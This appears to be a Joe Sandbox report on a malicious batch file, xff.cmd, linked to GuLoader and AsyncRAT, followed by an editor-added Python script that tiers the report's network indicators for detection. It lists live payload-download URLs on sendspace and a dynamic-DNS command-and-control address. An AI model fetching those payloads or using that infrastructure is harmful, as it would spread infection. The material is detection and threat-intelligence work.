https://contoso.com/License | powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n5.sendspace.com/dlpro/2e5b0068e88ecbc579c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold | wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 0000000A.00000003.2613840916.0000000007D57000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 0000000A.00000002.3343246570.0000000007D40000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/w4e2qbP | powershell.exe, 00000003.00000002.2793992270.0000017BBF9FD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://fs13n2.sendspace.com | powershell.exe, 00000003.00000002.2793992270.0000017BC15B1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sendspace.com | powershell.exe, 00000003.00000002.2793992270.0000017BC1579000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs13n2.sendspace.com | powershell.exe, 00000003.00000002.2793992270.0000017BBFC63000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2793992270.0000017BC159E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com | powershell.exe, 00000003.00000002.2793992270.0000017BC1091000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2793992270.0000017BBF9FD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/w4e2qbXR | powershell.exe, 00000006.00000002.2617612973.0000000004CCC000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/ | wab.exe, 0000000A.00000002.3343246570.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n5.sendspace.com/hf | wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 0000000A.00000003.2613840916.0000000007D57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2617612973.0000000004B71000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs13n2.sendspaX | powershell.exe, 00000003.00000002.2793992270.0000017BC159E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.2910312975.0000017BCF83F000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.2621078427.0000000005BD7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs03n5.sendspace.com/om:443 | wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n5.sendspace.com/79c4ba215340ac1a/664f9316/6f2c5c/JXfZIuRPwNaOvold98.bin | wab.exe, 0000000A.00000003.2605230606.0000000007D57000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.2793992270.0000017BBF7D1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.2793992270.0000017BBF7D1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000006.00000002.2617612973.0000000004B71000.00000004.00000800.00020000.00000000.sdmp; wab.exe, 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
69.31.136.17 | fs03n5.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
12.202.180.134 | dhhj.duckdns.org | United States | 22983 | FISERV-INCUS | true
104.21.28.80 | www.sendspace.com | United States | 13335 | CLOUDFLARENETUS | false
69.31.136.57 | fs13n2.sendspace.com | United States | 3257 | GTT-BACKBONEGTTDE | false
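The four addresses in that table are not equally useful as detections. The report marks only the dynamic-DNS host dhhj.duckdns.org (12.202.180.134) as malicious; the sendspace file servers and the Cloudflare-fronted www.sendspace.com are shared infrastructure the loader used to stage its payload, and the URL table above attributes the fs03n5.sendspace.com downloads to wab.exe, the process the payload was injected into. The script below, added here as an example and not part of the Joe Sandbox report, tiers those indicators and runs them over constructed Sysmon-style network events. The log lines, the lists of script hosts and browsers, and the escalation rules are the editor's assumptions; the indicators and the wab.exe/powershell.exe attributions are taken from the report.

```python
"""
Tier the network indicators from this report and match them against endpoint
telemetry. Added example by the editor, not part of the Joe Sandbox report;
the events below are constructed, not captured from the sample run.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

# From the report's IP / domain table. Only the dynamic-DNS host is marked
# "Malicious: true"; the sendspace and Cloudflare entries are shared hosting
# the loader used for staging, so on their own they are weak evidence.
HIGH = {"dhhj.duckdns.org", "12.202.180.134"}
MEDIUM = {"fs03n5.sendspace.com", "69.31.136.17",
          "fs13n2.sendspace.com", "69.31.136.57"}
LOW = {"www.sendspace.com", "104.21.28.80"}

# The report's URL table shows wab.exe (Windows Address Book) pulling from
# fs03n5.sendspace.com and powershell.exe holding the www/fs13n2 URLs.
INJECTED_HOST = "wab.exe"
# Assumed lists for the escalation rules (editor's choice, not from the report).
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe"}


@dataclass
class NetEvent:
    ts: str
    image: str   # process image name
    host: str    # hostname resolved or contacted ("" if only the IP is known)
    dst_ip: str  # destination IP ("" for a DNS-only event)


def base_tier(ev: NetEvent) -> Optional[str]:
    """Highest indicator tier that the event's host or IP falls into."""
    names = {ev.host.strip().lower(), ev.dst_ip.strip()}
    if names & HIGH:
        return "high"
    if names & MEDIUM:
        return "medium"
    if names & LOW:
        return "low"
    return None


def classify(ev: NetEvent) -> Optional[Tuple[str, str]]:
    """Return (severity, reason), or None when the event needs no alert."""
    tier = base_tier(ev)
    if tier is None:
        return None
    image = ev.image.lower()
    target = ev.host or ev.dst_ip
    if tier == "high":
        return "high", f"{image} contacted C2 indicator {target}"
    if image == INJECTED_HOST:
        # The report shows the payload running inside wab.exe and wab.exe
        # fetching from the sendspace file server; a LOLBin reaching a
        # file-sharing site is the loader's download step, not user activity.
        return "high", f"injected host {image} reached staging infrastructure {target}"
    if image in SCRIPT_HOSTS:
        return "medium", f"script host {image} reached shared staging infrastructure {target}"
    if tier == "low" and image in BROWSERS:
        return None  # a user browsing sendspace through Cloudflare is not an alert
    return tier, f"{image} contacted {target}"


def triage(events: List[NetEvent]) -> List[Tuple[str, str, str]]:
    """Alerts as (ts, severity, reason), highest severity first, then by time."""
    order = {"high": 0, "medium": 1, "low": 2}
    hits = []
    for ev in events:
        res = classify(ev)
        if res:
            hits.append((ev.ts, res[0], res[1]))
    return sorted(hits, key=lambda h: (order[h[1]], h[0]))


# Constructed telemetry (not from the report), one row per DNS/network event.
SAMPLE_EVENTS = [
    NetEvent("15:02:20", "chrome.exe", "www.sendspace.com", "104.21.28.80"),
    NetEvent("15:02:31", "powershell.exe", "www.sendspace.com", "104.21.28.80"),
    NetEvent("15:02:33", "powershell.exe", "fs13n2.sendspace.com", "69.31.136.57"),
    NetEvent("15:02:41", "wab.exe", "fs03n5.sendspace.com", "69.31.136.17"),
    NetEvent("15:02:50", "wab.exe", "", "12.202.180.134"),
    NetEvent("15:02:58", "svchost.exe", "ctldl.windowsupdate.com", ""),
]

if __name__ == "__main__":
    for ts, severity, reason in triage(SAMPLE_EVENTS):
        print(f"{ts} [{severity:6}] {reason}")
```

Run as-is it prints two high alerts (wab.exe reaching the file server, then the C2 address) and two medium ones for the PowerShell stager; the browser visit to www.sendspace.com and the Windows Update lookup produce nothing. The point of the tiers is the context column of the report's own associated-samples tables: the sendspace addresses recur across unrelated families, so matching them alone would page on ordinary file-sharing traffic.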
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446776
Start date and time: 2024-05-23 21:02:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 4s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: xff.cmd
Detection: MAL
Classification: mal100.troj.evad.winCMD@13/9@4/4
EGA Information: Failed
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 94
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .cmd
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 4324 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5700 because it is empty
• Execution Graph export aborted for target wab.exe, PID 5892 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: xff.cmd
Time | Type | Description
15:02:58 | API Interceptor | 4970x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
69.31.136.17 | new.cmd | malicious | GuLoader |
69.31.136.17 | las.cmd | malicious | GuLoader |
69.31.136.17 | zap.cmd | malicious | GuLoader, XWorm |
69.31.136.17 | kam.cmd | malicious | GuLoader |
69.31.136.17 | upload.vbs | malicious | GuLoader, XWorm |
69.31.136.17 | update.vbs | malicious | GuLoader, XWorm |
69.31.136.17 | file.vbs | malicious | GuLoader |
69.31.136.17 | windows.vbs | malicious | AsyncRAT, GuLoader |
69.31.136.17 | windows.vbs | malicious | GuLoader, XWorm |
69.31.136.17 | file.vbs | malicious | GuLoader, XWorm |
12.202.180.134 | new.cmd | malicious | GuLoader |
12.202.180.134 | las.cmd | malicious | GuLoader |
12.202.180.134 | kam.cmd | malicious | Unknown |
12.202.180.134 | sample.cmd | malicious | Unknown |
12.202.180.134 | zap.cmd | malicious | GuLoader, XWorm |
12.202.180.134 | xff.cmd | malicious | Unknown |
12.202.180.134 | xff.cmd | malicious | AsyncRAT, GuLoader |
12.202.180.134 | las.cmd | malicious | GuLoader, XWorm |
12.202.180.134 | las.cmd | malicious | Unknown |
12.202.180.134 | las.cmd | malicious | GuLoader |
104.21.28.80 | zap.cmd | malicious | GuLoader, XWorm |
104.21.28.80 | las.cmd | malicious | GuLoader |
104.21.28.80 | kam.cmd | malicious | GuLoader |
104.21.28.80 | upload.vbs | malicious | GuLoader, XWorm |
104.21.28.80 | update.vbs | malicious | GuLoader, XWorm |
104.21.28.80 | file.vbs | malicious | GuLoader |
104.21.28.80 | windows.vbs | malicious | AsyncRAT, GuLoader |
104.21.28.80 | update.vbs | malicious | GuLoader |
69.31.136.57 | new.cmd | malicious | GuLoader |
69.31.136.57 | xff.cmd | malicious | AsyncRAT, GuLoader |
69.31.136.57 | las.cmd | malicious | GuLoader, XWorm |
69.31.136.57 | las.cmd | malicious | GuLoader |
69.31.136.57 | kam.cmd | malicious | GuLoader |
69.31.136.57 | windows.vbs | malicious | GuLoader, XWorm |
69.31.136.57 | file.vbs | malicious | GuLoader, XWorm |
69.31.136.57 | update.vbs | malicious | GuLoader |
69.31.136.57 | time.vbs | malicious | GuLoader |
69.31.136.57 | https://www.sendspace.com/file/dwfkjz | malicious | FormBook |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
fs13n2.sendspace.com | new.cmd | malicious | GuLoader | 69.31.136.57
fs13n2.sendspace.com | xff.cmd | malicious | AsyncRAT, GuLoader | 69.31.136.57
fs13n2.sendspace.com | QWMSA_Payment_Invoice0939.vbs | malicious | Quasar | 69.31.136.57
fs03n5.sendspace.com | update.vbs | malicious | GuLoader, XWorm | 69.31.136.17
fs03n5.sendspace.com | file.vbs | malicious | GuLoader | 69.31.136.17
fs03n5.sendspace.com | windows.vbs | malicious | AsyncRAT, GuLoader | 69.31.136.17
fs03n5.sendspace.com | file.vbs | malicious | GuLoader, XWorm | 69.31.136.17
fs03n5.sendspace.com | UGH82MSGHWUSHSDHWQOL.vbs | malicious | Unknown | 69.31.136.17
dhhj.duckdns.org | windows.vbs | malicious | AsyncRAT, GuLoader | 12.202.180.134
www.sendspace.com | new.cmd | malicious | GuLoader | 172.67.170.105
www.sendspace.com | las.cmd | malicious | GuLoader | 172.67.170.105
www.sendspace.com | kam.cmd | malicious | GuLoader | 172.67.170.105
www.sendspace.com | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80
www.sendspace.com | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105
www.sendspace.com | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105
www.sendspace.com | las.cmd | malicious | GuLoader | 104.21.28.80
www.sendspace.com | kam.cmd | malicious | GuLoader | 104.21.28.80
www.sendspace.com | upload.vbs | malicious | GuLoader, XWorm | 104.21.28.80
www.sendspace.com | update.vbs | malicious | GuLoader, XWorm | 104.21.28.80

Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | new.cmd | malicious | GuLoader | 172.67.170.105
CLOUDFLARENETUS | las.cmd | malicious | GuLoader | 172.67.170.105
CLOUDFLARENETUS | kam.cmd | malicious | GuLoader | 172.67.170.105
CLOUDFLARENETUS | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80
CLOUDFLARENETUS | http://hxjmm.check-tl-ver-154-2.com | malicious | Unknown | 104.21.46.101
CLOUDFLARENETUS | xff.cmd | malicious | AsyncRAT, GuLoader | 172.67.170.105
CLOUDFLARENETUS | las.cmd | malicious | GuLoader, XWorm | 172.67.170.105
CLOUDFLARENETUS | https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recording | malicious | Unknown | 104.18.72.113
CLOUDFLARENETUS | https://t.co/PmbTTSQ6z4 | malicious | Unknown | 162.247.243.29
CLOUDFLARENETUS | Offer 15492024 15602024.docx.doc | malicious | Unknown | 172.67.171.37
GTT-BACKBONEGTTDE | new.cmd | malicious | GuLoader | 69.31.136.57
GTT-BACKBONEGTTDE | las.cmd | malicious | GuLoader | 69.31.136.17
GTT-BACKBONEGTTDE | kam.cmd | malicious | GuLoader | 69.31.136.53
GTT-BACKBONEGTTDE | zap.cmd | malicious | GuLoader, XWorm | 69.31.136.53
GTT-BACKBONEGTTDE | xff.cmd | malicious | AsyncRAT, GuLoader | 69.31.136.53
GTT-BACKBONEGTTDE | las.cmd | malicious | GuLoader, XWorm | 69.31.136.53
GTT-BACKBONEGTTDE | las.cmd | malicious | GuLoader | 69.31.136.53
GTT-BACKBONEGTTDE | kam.cmd | malicious | GuLoader | 69.31.136.57
GTT-BACKBONEGTTDE | upload.vbs | malicious | GuLoader, XWorm | 69.31.136.53
GTT-BACKBONEGTTDE | update.vbs | malicious | GuLoader, XWorm | 69.31.136.53
FISERV-INCUS | new.cmd | malicious | GuLoader | 12.202.180.134
FISERV-INCUS | las.cmd | malicious | GuLoader | 12.202.180.134
FISERV-INCUS | kam.cmd | malicious | Unknown | 12.202.180.134
FISERV-INCUS | sample.cmd | malicious | Unknown | 12.202.180.134
FISERV-INCUS | zap.cmd | malicious | GuLoader, XWorm | 12.202.180.134
FISERV-INCUS | xff.cmd | malicious | Unknown | 12.202.180.134
FISERV-INCUS | xff.cmd | malicious | AsyncRAT, GuLoader | 12.202.180.134
FISERV-INCUS | las.cmd | malicious | GuLoader, XWorm | 12.202.180.134
FISERV-INCUS | las.cmd | malicious | Unknown | 12.202.180.134
FISERV-INCUS | las.cmd | malicious | GuLoader | 12.202.180.134

Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | new.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | filePY.cmd | malicious | Unknown | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | las.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | kam.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | xff.cmd | malicious | AsyncRAT, GuLoader | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | las.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | S28BW-420120416270,pdf.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | Dextron Group PO.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 104.21.28.80, 69.31.136.57
3b5074b1b5d032e5620f69f9f700ff0e | las.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.57
37f463bf4616ecd445d4a1937da06e19 | new.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | las.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | zap.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | xff.cmd | malicious | AsyncRAT, GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | las.cmd | malicious | GuLoader, XWorm | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | las.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | V_273686.Lnk.lnk | malicious | MalLnk | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | kam.cmd | malicious | GuLoader | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 104.21.28.80, 69.31.136.17
37f463bf4616ecd445d4a1937da06e19 | Platosammine.exe | malicious | FormBook, GuLoader | 104.21.28.80
                                                                                            • 69.31.136.17
                                                                                            No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 11608
Entropy (8bit): 4.8908305915084105
Encrypted: false
SSDEEP: 192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
MD5: DD89E182EEC1B964E2EEFE5F8889DCD7
SHA1: 326A3754A1334C32056811411E0C5C96F8BFBBEE
SHA-256: 383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
SHA-512: B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllul/nq/llh:NllUyt
MD5: AB80AD9A08E5B16132325DF5584B2CBE
SHA1: F7411B7A5826EE6B139EBF40A7BEE999320EF923
SHA-256: 5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
SHA-512: 9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e................................................@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with very long lines (65536), with no line terminators
Category: dropped
Size (bytes): 488392
Entropy (8bit): 5.9540372489568805
Encrypted: false
SSDEEP: 12288:PqNUdgiNuRq7DGhS067IHb4BUCTEUHddGd7/jDt0jz/:Ci9NvGhS0iUCh47rDa/
MD5: 6A89EC6B007920C37249774D8B8CB1E5
SHA1: BC34D0226A45DD3C55A5F42E5E02ECE6079F3AEE
SHA-256: 09FDF5A6B9E458508DD06389CA3EBBAFCE89A8D35B539B1A5E131C1D6FF939A7
SHA-512: A21F562D2D2213FC981C6C08895A4E5E0B6163DB49858047F720E19001DE667348A630DE5BAB275D5973480827093DA4A06D87D2B198C91336849C5576A15191
Malicious: false

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6224
Entropy (8bit): 3.731537505931615
Encrypted: false
SSDEEP: 48:HzDmlGtCO3CyGU2UVAukvhkvklCywQnh+ilHJYSogZoAHh+ilLYSogZo01:nEO3CgTzkvhkvCCtyh+ixHBh+iHHD
MD5: 9D611F8D528692AF61269DDF6DFEE38A
SHA1: 82A0F811A36A11019D9B4541B4AB6F0CCEA1B54F
SHA-256: 01BAC2CF3E0FEB66F8E75D477F6E771AEA2ACD0A6F273328DD471949EA32E1D2
SHA-512: E57654530E7B2357252C41BB418AC762DAFEE7B8933717065A170AD4D2C6C558D791EC0F593389529713B6B8F386180A29ED436F634A880E85A9A10FC8C3D7B7
Malicious: false
Preview: ...................................FL..................F.".. ...J.S.....N.C...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...\...C....NX.C.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X[............................^.A.p.p.D.a.t.a...B.V.1......XY...Roaming.@......EW<2.XY...../......................u..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.XW.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.XW.....2......................'7.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.XW.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.XW.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X].....u...........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6224
Entropy (8bit): 3.731537505931615
Encrypted: false
SSDEEP: 48:HzDmlGtCO3CyGU2UVAukvhkvklCywQnh+ilHJYSogZoAHh+ilLYSogZo01:nEO3CgTzkvhkvCCtyh+ixHBh+iHHD
MD5: 9D611F8D528692AF61269DDF6DFEE38A
SHA1: 82A0F811A36A11019D9B4541B4AB6F0CCEA1B54F
SHA-256: 01BAC2CF3E0FEB66F8E75D477F6E771AEA2ACD0A6F273328DD471949EA32E1D2
SHA-512: E57654530E7B2357252C41BB418AC762DAFEE7B8933717065A170AD4D2C6C558D791EC0F593389529713B6B8F386180A29ED436F634A880E85A9A10FC8C3D7B7
Malicious: false
Preview: ...................................FL..................F.".. ...J.S.....N.C...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...\...C....NX.C.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X[............................^.A.p.p.D.a.t.a...B.V.1......XY...Roaming.@......EW<2.XY...../......................u..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.XW.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.XW.....2......................'7.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.XW.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.XW.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.X].....u...........

File type: ASCII text, with very long lines (6371), with no line terminators
Entropy (8bit): 5.254796604295901
TrID:
File name: xff.cmd
File size: 6'371 bytes
